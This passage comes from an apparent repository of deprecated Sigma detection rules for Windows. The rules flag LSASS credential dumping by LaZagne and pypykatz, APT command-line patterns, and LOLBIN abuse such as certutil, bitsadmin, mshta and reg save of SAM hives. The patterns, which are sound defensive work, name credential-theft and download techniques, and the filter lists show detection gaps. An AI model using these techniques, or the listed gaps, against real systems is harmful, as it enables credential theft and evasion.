LSASS process access by LaZagne for credential dumping. 
references: - https://twitter.com/bh4b3sh/status/1303674603819081728 author: Bhabesh Raj, Jonhnathan Ribeiro date: 2020/09/09 modified: 2022/08/13 tags: - attack.credential_access - attack.t1003.001 - attack.s0349 logsource: category: process_access product: windows detection: selection: TargetImage|endswith: '\lsass.exe' CallTrace|contains|all: - 'C:\Windows\SYSTEM32\ntdll.dll+' - '|C:\Windows\System32\KERNELBASE.dll+' - '_ctypes.pyd+' - 'python27.dll+' GrantedAccess: '0x1FFFFF' condition: selection falsepositives: - Unknown level: critical ================================================ FILE: deprecated/windows/proc_access_win_lsass_susp_access.yml ================================================ title: Credential Dumping Tools Accessing LSASS Memory id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d status: deprecated description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment - https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community date: 2017/02/16 modified: 2023/11/30 tags: - attack.credential_access - attack.t1003.001 - attack.s0002 - car.2019-04-004 logsource: category: process_access product: windows detection: selection: TargetImage|endswith: '\lsass.exe' GrantedAccess|startswith: - '0x40' # - '0x1000' # minimum access requirements to query basic info from 
service # - '0x1400' - '0x100000' - '0x1410' # car.2019-04-004 # - '0x1010' # car.2019-04-004 - '0x1438' # car.2019-04-004 - '0x143a' # car.2019-04-004 - '0x1418' # car.2019-04-004 - '0x1f0fff' - '0x1f1fff' - '0x1f2fff' - '0x1f3fff' filter_exact: SourceImage: - 'C:\WINDOWS\system32\taskmgr.exe' - 'C:\Windows\System32\perfmon.exe' filter_generic: SourceImage|startswith: - 'C:\Program Files\' - 'C:\Program Files (x86)\' GrantedAccess: - '0x1410' - '0x410' filter_defender: SourceImage|startswith: - 'C:\ProgramData\Microsoft\Windows Defender\' - 'C:\Program Files\Windows Defender\' - 'C:\Program Files\Microsoft Security Client\MsMpEng.exe' # Windows7 SourceImage|endswith: '\MsMpEng.exe' filter_defender_updates: SourceImage: 'C:\Windows\System32\svchost.exe' CallTrace|contains|all: - '|C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{' - '}\mpengine.dll+' GrantedAccess: '0x1418' filter_defender_calltrace: CallTrace|contains: - '|c:\program files\windows defender\mprtp.dll' - '|c:\program files\windows defender\MpClient.dll' filter_gaming_services: SourceImage|startswith: 'C:\Program Files\WindowsApps\' SourceImage|endswith: '\GamingServices.exe' GrantedAccess: - '0x1410' - '0x410' filter_specific_granted_access_1: SourceImage|endswith: - '\PROCEXP64.EXE' - '\PROCEXP.EXE' - 'C:\WINDOWS\system32\taskhostw.exe' - '\MBAMInstallerService.exe' GrantedAccess: - '0x1410' - '0x410' - '0x40' filter_specific_granted_access_2: SourceImage: - 'C:\WINDOWS\system32\wbem\wmiprvse.exe' - 'C:\Windows\syswow64\MsiExec.exe' - 'C:\Windows\System32\msiexec.exe' GrantedAccess: - '0x1410' - '0x410' - '0x1f1fff' - '0x1f3fff' filter_specific_granted_access_3: SourceImage: - 'C:\Windows\system32\wininit.exe' - 'C:\Windows\System32\lsass.exe' GrantedAccess: '0x1000000' filter_vmwaretools: SourceImage|startswith: 'C:\ProgramData\VMware\VMware Tools\' SourceImage|endswith: '\vmtoolsd.exe' filter_svchost: SourceImage: 'C:\WINDOWS\system32\svchost.exe' GrantedAccess: - '0x100000' - 
'0x1410' filter_nextron: SourceImage|endswith: - '\thor.exe' - '\thor64.exe' - '\aurora-agent.exe' - '\aurora-agent-64.exe' GrantedAccess: - '0x40' - '0x1010' filter_explorer: SourceImage|endswith: '\explorer.exe' GrantedAccess: '0x401' filter_mrt: SourceImage: 'C:\Windows\system32\MRT.exe' # Windows Malicious Software Removal Tool GrantedAccess: - '0x1410' - '0x1418' filter_handle: GrantedAccess: '0x40' SourceImage|endswith: - '\handle.exe' - '\handle64.exe' filter_edge: # version in path 96.0.1054.43 SourceImage|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application\' SourceImage|endswith: '\Installer\setup.exe' filter_webex: SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe' GrantedAccess: '0x401' filter_malwarebytes: SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe' GrantedAccess: '0x1410' filter_dropbox: SourceImage|contains: - ':\Windows\Temp\' - '\AppData\Local\Temp\' SourceImage|endswith: '.tmp\DropboxUpdate.exe' GrantedAccess: - '0x410' - '0x1410' filter_msbuild: # This FP was generated while building CPython from source and could be related to other similar examples. # But if you don't do that kind of stuff consider removing it from the rule ;) SourceImage|startswith: 'C:\Program Files\Microsoft Visual Studio\' SourceImage|endswith: '\MSBuild\Current\Bin\MSBuild.exe' GrantedAccess: '0x1F3FFF' # Old - too broad filter # SourceImage|endswith: # easy to bypass. 
need to implement supportive rule to detect bypass attempts # - '\wmiprvse.exe' # - '\taskmgr.exe' # - '\procexp64.exe' # - '\procexp.exe' # - '\lsm.exe' # - '\MsMpEng.exe' # - '\csrss.exe' # - '\wininit.exe' # - '\vmtoolsd.exe' filter_games: SourceImage|contains: '\SteamLibrary\steamapps\' condition: selection and not 1 of filter_* fields: - ComputerName - User - SourceImage falsepositives: - Likely level: high ================================================ FILE: deprecated/windows/proc_access_win_pypykatz_cred_dump_lsass_access.yml ================================================ title: Credential Dumping by Pypykatz id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b status: test description: Detects LSASS process access by pypykatz for credential dumping. references: - https://github.com/skelsec/pypykatz author: Bhabesh Raj date: 2021/08/03 modified: 2022/10/09 tags: - attack.credential_access - attack.t1003.001 logsource: category: process_access product: windows detection: selection: TargetImage|endswith: '\lsass.exe' CallTrace|contains|all: - 'C:\Windows\SYSTEM32\ntdll.dll+' - 'C:\Windows\System32\KERNELBASE.dll+' - 'libffi-7.dll' - '_ctypes.pyd+' - 'python3*.dll+' # Pypy requires python>=3.6 GrantedAccess: '0x1FFFFF' condition: selection falsepositives: - Unknown level: critical ================================================ FILE: deprecated/windows/proc_access_win_susp_invoke_patchingapi.yml ================================================ title: Potential NT API Stub Patching id: b916cba1-b38a-42da-9223-17114d846fd6 status: deprecated description: Detects potential NT API stub patching as seen used by the project PatchingAPI references: - https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch - https://twitter.com/D1rkMtr/status/1611471891193298944?s=20 author: frack113 date: 2023/01/07 modified: 2024/05/27 tags: - attack.defense_evasion - attack.t1562.002 logsource: category: process_access product: windows detection: selection: 
GrantedAccess: '0x1FFFFF' CallTrace|startswith: 'C:\Windows\SYSTEM32\ntdll.dll+' CallTrace|contains: '|UNKNOWN(' CallTrace|endswith: ')' filter_main_generic: # To avoid FP with installed applications. This filter assumes that if an application is located here. The attacker has already achieved admin rights - SourceImage|contains: - ':\Program Files\' - ':\Program Files (x86)\' - ':\Windows\System32\' - ':\Windows\SysWOW64\' - TargetImage|contains: - ':\Program Files\' - ':\Program Files (x86)\' - ':\Windows\System32\' - ':\Windows\SysWOW64\' filter_optional_thor: SourceImage|endswith: - '\thor.exe' - '\thor64.exe' filter_optional_githubdesktop: SourceImage|contains|all: - ':\Users\' - '\AppData\Local\GitHubDesktop\app-' SourceImage|endswith: - '\GitHubDesktop.exe' - '\resources\app\git\usr\bin\sh.exe' TargetImage|contains|all: - ':\Users\' - '\AppData\Local\GitHubDesktop\app-' filter_main_dotnet: SourceImage|contains: ':\Windows\Microsoft.NET\' TargetImage|contains: ':\Windows\Microsoft.NET\' filter_main_taskhost: SourceImage|contains: - ':\Windows\system32\taskhostw.exe' - ':\Windows\system32\taskhost.exe' TargetImage|contains: - ':\Windows\Microsoft.NET\Framework\v' - ':\Windows\Microsoft.NET\Framework64\v' TargetImage|endswith: '\NGenTask.exe' filter_optional_teams_to_update: SourceImage|endswith: '\AppData\Local\Microsoft\Teams\stage\Teams.exe' TargetImage|endswith: '\AppData\Local\Microsoft\Teams\Update.exe' filter_optional_teams_update_regsvr32: SourceImage|endswith: '\AppData\Local\Microsoft\Teams\Update.exe' TargetImage|endswith: ':\WINDOWS\SysWOW64\regsvr32.exe' filter_optional_teams_update_to_teams: SourceImage|endswith: '\AppData\Local\Microsoft\Teams\Update.exe' TargetImage|endswith: '\AppData\Local\Microsoft\Teams\stage\Teams.exe' condition: selection and not 1 of filter_main_* and not 1 of filter_optional_* falsepositives: - Unknown level: medium ================================================ FILE: 
deprecated/windows/proc_creation_win_apt_apt29_thinktanks.yml ================================================ title: APT29 id: 033fe7d6-66d1-4240-ac6b-28908009c71f status: deprecated description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. references: - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html author: Florian Roth (Nextron Systems) date: 2018/12/04 modified: 2023/03/08 tags: - attack.execution - attack.g0016 - attack.t1059.001 logsource: category: process_creation product: windows detection: selection: CommandLine|contains|all: - '-noni' - '-ep' - 'bypass' - '$' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_apt_dragonfly.yml ================================================ title: CrackMapExecWin id: 04d9079e-3905-4b70-ad37-6bdf11304965 status: deprecated description: Detects CrackMapExecWin Activity as Described by NCSC references: - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control - https://attack.mitre.org/software/S0488/ author: Markus Neis date: 2018/04/08 modified: 2023/03/08 tags: - attack.g0035 - attack.credential_access - attack.discovery - attack.t1110 - attack.t1087 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\crackmapexec.exe' condition: selection falsepositives: - Unknown level: critical ================================================ FILE: deprecated/windows/proc_creation_win_apt_gallium.yml ================================================ title: GALLIUM Artefacts id: 18739897-21b1-41da-8ee4-5b786915a676 
related: - id: 440a56bf-7873-4439-940a-1c8a671073c2 type: derived status: deprecated description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) author: Tim Burrell date: 2020/02/07 modified: 2023/03/09 tags: - attack.credential_access - attack.t1212 - attack.command_and_control - attack.t1071 logsource: product: windows category: process_creation detection: legitimate_process_path: Image|contains: - ':\Program Files(x86)\' - ':\Program Files\' legitimate_executable: Hashes|contains: 'SHA1=e570585edc69f9074cb5e8a790708336bd45ca0f' condition: legitimate_executable and not legitimate_process_path falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_apt_hurricane_panda.yml ================================================ title: Hurricane Panda Activity id: 0eb2107b-a596-422e-b123-b389d5594ed7 status: deprecated description: Detects Hurricane Panda Activity references: - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ author: Florian Roth (Nextron Systems) date: 2019/03/04 modified: 2023/03/10 tags: - attack.privilege_escalation - attack.g0009 - attack.t1068 logsource: category: process_creation product: windows detection: selection: - CommandLine|contains|all: - 'localgroup' - 'admin' - '/add' - CommandLine|contains: '\Win64.exe' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_apt_lazarus_activity_apr21.yml ================================================ title: Lazarus Activity Apr21 id: 
4a12fa47-c735-4032-a214-6fab5b120670 status: deprecated description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity references: - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ author: Bhabesh Raj date: 2021/04/20 modified: 2023/03/10 tags: - attack.g0032 - attack.execution - attack.t1106 logsource: category: process_creation product: windows detection: selection_1: CommandLine|contains|all: - 'mshta' # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3 - '.zip' selection_2: ParentImage: 'C:\Windows\System32\wbem\wmiprvse.exe' # Covered by 8a582fe2-0882-4b89-a82a-da6b2dc32937 Image: 'C:\Windows\System32\mshta.exe' selection_3: ParentImage|contains: ':\Users\Public\' Image: 'C:\Windows\System32\rundll32.exe' condition: 1 of selection_* falsepositives: - Should not be any false positives level: high ================================================ FILE: deprecated/windows/proc_creation_win_apt_lazarus_loader.yml ================================================ title: Lazarus Loaders id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e status: deprecated description: Detects different loaders as described in various threat reports on Lazarus group activity references: - https://www.hvs-consulting.de/lazarus-report/ - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ author: Florian Roth (Nextron Systems), wagga date: 2020/12/23 modified: 2023/03/10 tags: - attack.g0032 - attack.execution - attack.t1059 logsource: category: process_creation product: windows detection: selection_cmd1: CommandLine|contains|all: - 'cmd.exe /c ' - ' -p 0x' selection_cmd2: CommandLine|contains: - 'C:\ProgramData\' - 'C:\RECYCLER\' selection_rundll1: CommandLine|contains|all: - 'rundll32.exe ' - 'C:\ProgramData\' selection_rundll2: CommandLine|contains: - '.bin,' - '.tmp,' - '.dat,' - '.io,' - '.ini,' - '.db,' condition: ( selection_cmd1 
and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 ) falsepositives: - Unknown level: critical ================================================ FILE: deprecated/windows/proc_creation_win_apt_muddywater_dnstunnel.yml ================================================ title: DNS Tunnel Technique from MuddyWater id: 7454df60-1478-484b-810d-bff5d0ba6d4b status: deprecated description: Detects DNS tunnel activity attributed to the MuddyWater actor references: - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/ - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html author: '@caliskanfurkan_' date: 2020/06/04 modified: 2023/03/10 tags: - attack.command_and_control - attack.t1071.004 logsource: category: process_creation product: windows detection: selection: Image|endswith: - '\powershell.exe' - '\pwsh.exe' ParentImage|endswith: '\excel.exe' CommandLine|contains: 'DataExchange.dll' condition: selection falsepositives: - Unknown level: critical ================================================ FILE: deprecated/windows/proc_creation_win_apt_ta505_dropper.yml ================================================ title: TA505 Dropper Load Pattern id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 status: deprecated description: Detects mshta launched with wmiprvse as its parent process, as used by TA505 malicious documents references: - https://twitter.com/ForensicITGuy/status/1334734244120309760 author: Florian Roth (Nextron Systems) date: 2020/12/08 modified: 2023/04/05 tags: - attack.execution - attack.g0092 - attack.t1106 logsource: category: process_creation product: windows detection: selection_parent: ParentImage|endswith: '\wmiprvse.exe' selection_mshta: - Image|endswith: '\mshta.exe' - OriginalFileName: 'mshta.exe' condition: all of selection_* falsepositives: - Unknown level: critical ================================================ FILE: deprecated/windows/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml 
================================================ title: File Download Via Bitsadmin To An Uncommon Target Folder id: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248 status: deprecated description: Detects usage of bitsadmin downloading a file to uncommon target folder references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022-06-28 modified: 2025-12-10 tags: - attack.defense-evasion - attack.persistence - attack.t1197 - attack.s0190 - attack.t1036.003 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: '\bitsadmin.exe' - OriginalFileName: 'bitsadmin.exe' selection_flags: CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_folder: CommandLine|contains: - '%AppData%' - '%temp%' - '%tmp%' - '\AppData\Local\' - 'C:\Windows\Temp\' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_certutil_susp_execution.yml ================================================ title: Suspicious Certutil Command Usage id: e011a729-98a6-4139-b5c4-bf6f6dd8239a status: deprecated description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code references: - https://twitter.com/JohnLaTwC/status/835149808817991680 - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/ - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/ - https://twitter.com/egre55/status/1087685529016193025 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ author: Florian Roth (Nextron Systems), juju4, keepwatch date: 2019/01/16 
modified: 2023/02/15 tags: - attack.defense_evasion - attack.t1140 - attack.command_and_control - attack.t1105 - attack.s0160 - attack.g0007 - attack.g0010 - attack.g0045 - attack.g0049 - attack.g0075 - attack.g0096 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: '\certutil.exe' - OriginalFileName: 'CertUtil.exe' selection_cli: CommandLine|contains: - ' -decode ' - ' -decodehex ' - ' -urlcache ' - ' -verifyctl ' - ' -encode ' - ' -exportPFX ' - ' /decode ' - ' /decodehex ' - ' /urlcache ' - ' /verifyctl ' - ' /encode ' - ' /exportPFX ' condition: all of selection_* fields: - CommandLine - ParentCommandLine falsepositives: - False positives depend on scripts and administrative tools used in the monitored environment level: high ================================================ FILE: deprecated/windows/proc_creation_win_cmd_read_contents.yml ================================================ title: Read and Execute a File Via Cmd.exe id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 status: deprecated description: Detect use of "/R <" to read and execute a file via cmd.exe references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md author: frack113 date: 2022/08/20 modified: 2023/03/07 tags: - attack.execution - attack.t1059.003 logsource: category: process_creation product: windows detection: selection_cmd: - OriginalFileName: 'Cmd.Exe' - Image|endswith: '\cmd.exe' selection_read: - ParentCommandLine|contains|all: - 'cmd' - '/r ' - '<' - CommandLine|contains|all: - 'cmd' - '/r ' - '<' condition: all of selection_* falsepositives: - Legitimate use level: medium ================================================ FILE: deprecated/windows/proc_creation_win_cmd_redirect_to_stream.yml ================================================ title: Cmd Stream Redirection id: 70e68156-6571-427b-a6e9-4476a173a9b6 status: deprecated description: Detects the redirection 
of an alternate data stream (ADS) of / within a Windows command line session references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt author: frack113 date: 2022/02/04 modified: 2023/03/07 tags: - attack.defense_evasion - attack.t1564.004 logsource: category: process_creation product: windows detection: selection: Image|endswith: '\cmd.exe' CommandLine|contains|all: - '> ' - ':' filter: CommandLine|contains: ' :\' condition: selection and not filter falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_credential_acquisition_registry_hive_dumping.yml ================================================ title: Credential Acquisition via Registry Hive Dumping id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0 status: deprecated description: Detects Credential Acquisition via Registry Hive Dumping references: - https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html author: Tim Rauch date: 2022/10/04 modified: 2023/02/06 tags: - attack.credential_access - attack.t1003 logsource: category: process_creation product: windows detection: selection_1: - Image|endswith: '\reg.exe' - OriginalFileName: 'reg.exe' selection_2: CommandLine|contains: - ' save ' - ' export ' selection_3: CommandLine|contains: - 'hklm\sam' - 'hklm\security' - 'HKEY_LOCAL_MACHINE\SAM' - 'HKEY_LOCAL_MACHINE\SECURITY' condition: all of selection_* level: high ================================================ FILE: deprecated/windows/proc_creation_win_cscript_vbs.yml ================================================ title: Visual Basic Script Execution id: 23250293-eed5-4c39-b57a-841c8933a57d status: deprecated description: Adversaries may abuse Visual Basic (VB) for execution references: - 
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md author: frack113 date: 2022/01/02 modified: 2023/03/06 tags: - attack.execution - attack.t1059.005 logsource: category: process_creation product: windows detection: selection_exe: - OriginalFileName: - 'cscript.exe' - 'wscript.exe' - Image|endswith: - '\cscript.exe' - '\wscript.exe' selection_script: CommandLine|contains: '.vbs' condition: all of selection_* falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml ================================================ title: Execution via MSSQL Xp_cmdshell Stored Procedure id: 344482e4-a477-436c-aa70-7536d18a48c7 related: - id: d08dd86f-681e-4a00-a92c-1db218754417 type: derived - id: 7f103213-a04e-4d59-8261-213dddf22314 type: derived status: deprecated description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. 
references: - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html author: Tim Rauch date: 2022/09/28 modified: 2023/03/06 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: windows detection: selection_img: - Image|endswith: '\cmd.exe' - OriginalFileName: 'Cmd.Exe' selection_parent: ParentImage|endswith: '\sqlservr.exe' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_filefix_browsers.yml ================================================ title: FileFix - Suspicious Child Process from Browser File Upload Abuse id: 4be03877-d5b6-4520-85c9-a5911c0a656c status: deprecated description: | Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities. 
references: - https://mrd0x.com/filefix-clickfix-alternative/ author: 0xFustang date: 2025-06-26 modified: 2025-11-24 tags: - attack.execution - attack.t1204.004 logsource: category: process_creation product: windows detection: selection: ParentImage|endswith: - '\brave.exe' - '\chrome.exe' - '\firefox.exe' - '\msedge.exe' Image|endswith: - '\bitsadmin.exe' - '\certutil.exe' - '\cmd.exe' - '\mshta.exe' - '\powershell.exe' - '\pwsh.exe' - '\regsvr32.exe' CommandLine|contains: '#' condition: selection falsepositives: - Legitimate use of PowerShell or other utilities launched from browser extensions or automation tools level: high ================================================ FILE: deprecated/windows/proc_creation_win_indirect_cmd.yml ================================================ title: Indirect Command Execution id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 status: deprecated description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2019/10/24 modified: 2023/01/04 tags: - attack.defense_evasion - attack.t1202 logsource: category: process_creation product: windows detection: selection: ParentImage|endswith: - '\pcalua.exe' - '\forfiles.exe' condition: selection fields: - ComputerName - User - ParentCommandLine - CommandLine falsepositives: - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts. - Legitimate usage of scripts. 
level: low ================================================ FILE: deprecated/windows/proc_creation_win_indirect_command_execution_forfiles.yml ================================================ title: Indirect Command Execution via Forfiles id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 related: - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 type: obsolete status: deprecated description: Detects execution of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/10/17 modified: 2023/01/04 tags: - attack.defense_evasion - attack.t1202 logsource: product: windows category: process_creation detection: selection_parent: ParentImage|endswith: '\forfiles.exe' selection_c: ParentCommandLine|contains: - ' /c ' - ' -c ' selection_p: ParentCommandLine|contains: - ' /p ' - ' -p ' selection_m: ParentCommandLine|contains: - ' /m ' - ' -m ' filter: Image|endswith: '\cmd.exe' CommandLine|contains|all: - 'xcopy' - 'cmd /c del' condition: all of selection_* and not filter falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_invoke_obfuscation_via_rundll.yml ================================================ title: Invoke-Obfuscation RUNDLL LAUNCHER id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555 status: deprecated description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2023/02/21 tags: - attack.defense_evasion - attack.t1027 - 
attack.execution - attack.t1059.001 logsource: category: process_creation product: windows detection: selection: CommandLine|contains|all: - 'rundll32.exe' - 'shell32.dll' - 'shellexec_rundll' - 'powershell' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: deprecated/windows/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml ================================================ title: Invoke-Obfuscation Via Use Rundll32 id: 36c5146c-d127-4f85-8e21-01bf62355d5a status: deprecated description: Detects Obfuscated Powershell via use Rundll32 in Scripts references: - https://github.com/SigmaHQ/sigma/issues/1009 author: Nikita Nazarov, oscd.community date: 2019/10/08 modified: 2022/12/30 tags: - attack.defense_evasion - attack.t1027 - attack.execution - attack.t1059.001 logsource: category: process_creation product: windows detection: selection: CommandLine|contains|all: - '&&' - 'rundll32' - 'shell32.dll' - 'shellexec_rundll' CommandLine|contains: - 'value' - 'invoke' - 'comspec' - 'iex' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_lolbas_execution_of_wuauclt.yml ================================================ title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 status: experimental description: Adversaries can abuse wuauclt.exe (Windows Update client) to execute code by specifying an arbitrary DLL. 
references: - https://dtm.uk/wuauclt/ author: Sreeman date: 2020/10/29 modified: 2022/05/27 logsource: product: windows category: process_creation detection: selection: CommandLine|contains|all: - 'wuauclt.exe' - '/UpdateDeploymentProvider' - '/Runhandlercomserver' filter: CommandLine|contains: - 'wuaueng.dll' - 'UpdateDeploymentProvider.dll /ClassId' condition: selection and not filter falsepositives: - Wuaueng.dll which is a module belonging to Microsoft Windows Update. fields: - CommandLine level: medium tags: - attack.defense_evasion - attack.execution - attack.t1218 ================================================ FILE: deprecated/windows/proc_creation_win_lolbin_findstr.yml ================================================ title: Abusing Findstr for Defense Evasion id: bf6c39fc-e203-45b9-9538-05397c1b4f3f status: deprecated description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f author: 'Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali' date: 2020/10/05 modified: 2022/10/12 tags: - attack.defense_evasion - attack.t1218 - attack.t1564.004 - attack.t1552.001 - attack.t1105 logsource: category: process_creation product: windows detection: selection_findstr: - CommandLine|contains: findstr - Image|endswith: 'findstr.exe' - OriginalFileName: 'FINDSTR.EXE' selection_cli_download_1: CommandLine|contains: - ' /v ' - ' -v ' selection_cli_download_2: CommandLine|contains: - ' /l ' - ' -l ' selection_cli_creds_1: CommandLine|contains: - ' /s ' - ' -s ' selection_cli_creds_2: CommandLine|contains: - ' /i ' - ' -i ' condition: selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*) falsepositives: - Administrative 
findstr usage level: medium ================================================ FILE: deprecated/windows/proc_creation_win_lolbin_office.yml ================================================ title: Suspicious File Download Using Office Application id: 0c79148b-118e-472b-bdb7-9b57b444cc19 status: test description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/ - https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 author: Beyu Denis, oscd.community date: 2019/10/26 modified: 2023/02/04 tags: - attack.command_and_control - attack.t1105 logsource: category: process_creation product: windows detection: selection: Image|endswith: - '\powerpnt.exe' - '\winword.exe' - '\excel.exe' CommandLine|contains: 'http' condition: selection falsepositives: - Unknown level: high ================================================ FILE: deprecated/windows/proc_creation_win_lolbin_rdrleakdiag.yml ================================================ title: Process Memory Dumped Via RdrLeakDiag.EXE id: 6355a919-2e97-4285-a673-74645566340d status: deprecated description: Detects uses of the rdrleakdiag.exe LOLBIN utility to dump process memory references: - 